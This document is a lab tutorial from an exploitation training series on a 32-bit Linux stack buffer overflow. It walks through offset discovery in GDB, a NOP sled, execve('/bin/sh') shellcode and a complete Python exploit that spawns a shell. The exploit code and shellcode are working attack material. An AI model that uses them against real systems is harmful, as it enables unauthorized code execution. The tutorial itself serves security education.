Tutorial

Basic Stack Buffer Overflow on x86

A comprehensive guide to exploiting stack buffer overflows on 32-bit Linux systems, from vulnerability discovery to shellcode execution.

5 min read intermediate

Prerequisites

  • Understanding of x86 assembly and calling conventions
  • Familiarity with GDB and GDB-PEDA
  • Basic Python scripting
  • Knowledge of memory layout and the stack

Part 5 of 13 in Linux Exploitation Fundamentals

Table of Contents

This tutorial walks through exploiting a classic stack buffer overflow on a 32-bit Linux system. We’ll identify the vulnerability, find the EIP offset, and execute shellcode to spawn a shell.

Note

Lab Setup This tutorial uses the vuln binary from the Linux Exploitation Lab (02-basic-overflow-x86/). See the setup guide for build instructions and tool installation.

If building natively, install the required tools and disable ASLR:

sudo apt install checksec ltrace gdb
# Disable ASLR (re-enable with value 2 when done)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Remember to re-enable ASLR when you’re finished: echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

For a visual introduction to how buffer overflows corrupt memory, the Memory Corruption Playground lets you trigger overflows and watch the stack corrupt in real time. The Exploit Chain Visualizer maps the full five-stage path from vulnerability discovery through code execution.

Initial Analysis

Identifying Vulnerable Functions

Use ltrace to trace library calls:

ltrace ./unknown

If you see strcpy being called with user-controlled input, the binary is likely vulnerable:

strcpy(0xbffff456, "user_input"...

Checking Security Settings

Use checksec to identify protections:

checksec --file=./unknown

For this tutorial, we assume:

  • NX disabled (executable stack)
  • No stack canary
  • No PIE
  • ASLR disabled. ASLR (Address Space Layout Randomization) randomizes the base addresses of the stack, heap, and shared libraries each time a program runs, making hardcoded addresses unreliable. We disable it for learning so that addresses remain predictable between runs.

Warning

Verify your binary actually has no mitigations Modern toolchains turn on -fstack-protector-strong, PIE, and full RELRO by default, so a binary you build yourself with gcc vuln.c -o vuln will have a canary even if you didn’t ask for one. The lab vuln is built explicitly with -fno-stack-protector -no-pie -z execstack -m32 to remove them. Confirm before continuing:

checksec --file=./unknown
# Expect: Canary: No canary, NX: NX disabled, PIE: No PIE

If you see “Canary found” or “PIE enabled”, later steps will fail in confusing ways (the canary check kills the process before EIP gets overwritten, or the addresses you hardcode are wrong on the next run). The mitigation-bypass tutorials later in this series cover what to do when you cannot just disable them.

Finding the EIP Offset

Discovering the Crash Point

The binary takes command-line arguments. Test for overflow:

gdb -q ./unknown
gdb-peda$ pattern create 400
gdb-peda$ run 'AAA%AAs...'  # paste the pattern

After the crash:

Stopped reason: SIGSEGV
0x5a254177 in ?? ()
gdb-peda$ pattern offset 0x5a254177
1512391031 found at offset: 390

Verifying EIP Control

Create a test payload:

#!/usr/bin/env python3
# payload.py
import sys

payload = b"A"*390
payload += b"BBBB"
sys.stdout.buffer.write(payload)
gdb-peda$ run `python3 payload.py`

Stopped reason: SIGSEGV
0x42424242 in ?? ()

EIP is under our control.

Locating the Buffer in Memory

Examine the stack to find where our buffer lands:

gdb-peda$ x/30wx $esp-0x190
0xbffff2a0:     0xb7fd91c0      0x4141fc08      0x41414141      0x41414141
0xbffff2b0:     0x41414141      0x41414141      0x41414141      0x41414141

Look for the repeating 0x41414141 pattern in the hex dump; this is where your ‘A’ characters (0x41 in ASCII) landed. The start of this pattern is your buffer address.

The buffer begins at approximately 0xbffff2a6.

Testing Execution Flow

Using INT3 Breakpoints

Before adding shellcode, verify we can redirect execution using INT3 instructions:

Note

Little-Endian Byte Ordering x86 and x64 processors use little-endian byte ordering, which stores the least significant byte at the lowest memory address. This means addresses must be written in reverse byte order in exploits. For example, the address 0x080484cb becomes \xcb\x84\x04\x08 in your payload. If you see an address like 0xdeadbeef, you’d write it as \xef\xbe\xad\xde.

#!/usr/bin/env python3
# payload.py
import sys

payload = b"\xcc"*390              # INT3 breakpoints
payload += b"\xc0\xf2\xff\xbf"     # EIP = 0xbffff2c0

sys.stdout.buffer.write(payload)
gdb-peda$ run `python3 payload.py`

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff2c1 in ?? ()

We’re executing code on the stack.

Adding a NOP Sled

Add NOPs before the shellcode for reliability:

#!/usr/bin/env python3
import sys

sc = b"\xcc"  # INT3 placeholder
nop = b"\x90"*50

payload = b""
payload += nop
payload += sc
payload += b"A"*(390-len(nop)-len(sc))
payload += b"\xc0\xf2\xff\xbf"  # EIP

sys.stdout.buffer.write(payload)

Creating the Exploit

Shellcode

Use a simple execve("/bin/sh") shellcode:

sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"

Complete Exploit

#!/usr/bin/env python3
# exploit.py
import sys

sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
nop = b"\x90"*50

payload = b""
payload += nop
payload += sc
payload += b"A"*(390-len(nop)-len(sc))
payload += b"\xc0\xf2\xff\xbf"  # Return address

sys.stdout.buffer.write(payload)

Testing in GDB

gdb-peda$ run `python3 exploit.py`

process 2911 is executing new program: /bin/dash
$

Adjusting for Outside GDB

Memory addresses differ outside the debugger due to environment variables and other factors.

Generate a Core Dump

ulimit -c unlimited
./unknown `python3 exploit.py`

Analyze the Core

gdb -q ./unknown ./core
gdb-peda$ x/40wx $esp-0x200

Find the NOP sled and update the return address accordingly. Choose an address that points somewhere in the middle of your NOP sled, not the exact start. This provides a margin of error, even if the actual address is slightly different at runtime, execution will still land on a NOP and slide into your shellcode.

Final Execution

(python3 exploit.py; cat) | ./unknown
whoami
root

The cat command after the Python script keeps stdin open. Without it, the pipe closes immediately after sending the payload, and any shell spawned by the exploit would have no input to read; it would exit instantly. The cat passes your keyboard input through to the spawned shell.

Warning

whoami Output The whoami output depends on how the binary is configured. You’ll only see root if the binary is SUID root. On a standard lab setup without SUID, you’ll see your own username: the exploit still succeeded if you got a shell.

Key Concepts

Buffer Layout

The following diagrams show the stack before and after the overflow. In the normal state, the return address points back into the caller. After the overflow, our payload has overwritten everything from the buffer through the return address:

         BEFORE OVERFLOW
┌──────────────────────────────┐
│ return address → caller      │ EBP+0x04
├──────────────────────────────┤
│ saved EBP                    │ EBP
├──────────────────────────────┤
│                              │
│ buffer[390]                  │
│ (normal data)                │
│                              │
├──────────────────────────────┤
ESP → (top of stack)

         AFTER OVERFLOW
┌──────────────────────────────┐
│ 0xbffff2c0 → NOP sled       │ EBP+0x04
├──────────────────────────────┤
│ AAAA (overwritten)           │ EBP
├──────────────────────────────┤
│ AAAAAAA... padding (317B)    │
├──────────────────────────────┤
│ shellcode (23B)              │
├──────────────────────────────┤
│ NOP sled: 0x90909090 (50B)   │
├──────────────────────────────┤
ESP → (top of stack)

The payload layout as a flat byte sequence:

[    NOP Sled    ][  Shellcode  ][   Padding   ][ Return Addr ]
     50 bytes        23 bytes      317 bytes       4 bytes
                                                      |
                                        Points into NOP sled

When ret executes, it pops our crafted return address (0xbffff2c0) into EIP. Execution lands somewhere in the NOP sled, slides through the 0x90 bytes, and hits the shellcode.

Why NOPs?

The NOP sled provides a landing zone. Small variations in stack addresses between runs are absorbed by the sled, making the exploit more reliable.

Common Bad Characters

  • 0x00 - Null byte, terminates strings
  • 0x0a - Newline, may terminate input
  • 0x0d - Carriage return

Troubleshooting

Shellcode Not Executing

If execution fails with -z execstack:

  1. Check kernel parameters - some require noexec=off:

    # /etc/default/grub
    GRUB_CMDLINE_LINUX_DEFAULT="quiet noexec=off noexec32=off"
  2. Update grub and reboot:

    sudo update-grub

Address Differences

Stack addresses differ between GDB and normal execution. Always verify with core dumps when exploiting outside the debugger.